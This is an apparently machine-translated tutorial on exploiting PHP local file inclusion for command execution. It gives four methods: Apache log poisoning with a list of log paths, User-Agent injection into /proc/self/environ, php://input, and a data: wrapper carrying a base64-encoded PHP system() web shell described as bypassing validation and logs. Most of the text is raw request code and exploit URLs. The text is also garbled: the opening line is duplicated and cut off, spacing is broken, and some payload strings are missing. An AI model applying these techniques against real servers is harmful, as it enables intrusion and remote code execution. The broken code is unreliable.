The function used in HIZ magazine is passthru (http://cn2.php.net/passthru), mainly to achieve a Trojan, of course, you can also use exec and system functions, the difference between the three can refer to the PHP execution system external command system () exec () passthru (): http://hi.baidu.co
The function used in HIZ magazine is passthru (http://cn2.php.net/passthru), mainly to achieve a Trojan, of course, you can also use exec and system functions, the difference between the three can refer to the PHP execution system external command system () exec () passthru (): http://hi.baidu.com/cgeek/blog/item/fb9a1e4cd1bf1afdd62afc73.html
Vulnerability code:
Method 1:
The request code is as follows:
$ A = fsockopen ("localhost", 80 );
Fwrite ($ a, "GET/ HTTP/1.1 ".
"Host: localhost ".
"Connection: Close ");
Fclose ($ );
?>
Next, execute the request based on the server's log file path, such as aphche. you can execute the following requests:
Http: // localhost/index. php? Content =/var/log/httpd/access_log & cmd = id
Of course, there are other log file paths, such:
"/Etc/httpd/logs/acces_log ",
"/Etc/httpd/logs/acces. log ",
"/Var/www/logs/access_log ",
"/Var/www/logs/access. log ",
"/Usr/local/apache/logs/access_log ",
"/Usr/local/apache/logs/access. log ",
"/Var/log/apache/access_log ",
"/Var/log/apache/access. log ",
"/Var/log/httpd/access_log ",
"/Var/log/httpd/access. log ",
"D:/apps/Apache Group/Apache2/logs/access. log"
Method 2:
In addition, you can also use the file/proc/self/environ that contains environment variables. at this time, we insert malicious code into the User-Agent header, the code will be recorded in the above file. the specific code is as follows:
$ A = fsockopen ("localhost", 80 );
Fwrite ($,
"GET/../proc/self/environ HTTP/1.1 ".
"User-Agent: ".
"Host: localhost ".
"Connection: Close ");
Fclose ($ );
?>
Method 3:
Another way is to use php: // wrapper (http://www.php.net/wrappers.php), such as using php: // input to get the raw data in the http post request and execute it remotely:
$ Request =" ";
$ Req = "POST/index. php? Content = php: // input HTTP/1.1 ".
"Host: localhost ".
"Content-type: text/html ".
"Content-length:". strlen ($ request )."".
"Connection: Close ".
"$ Request ";
$ A = fsockopen ("localhost", 80 );
Fwrite ($ a, $ req );
Echo $ req;
While (! Feof ($ ))
{Echo fgets ($ a, 128 );}
Fclose ($ );
?>
Method 4:
Using "data:" wrapper (http://cn.php.net/manual/en/wrappers.data.php ):
Index. php? Content = data: ? & C = dir
You can perform base64 encryption again to bypass validation/sketchy logs:
Index. php? Content = data:; base64,
PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4 = & c = dir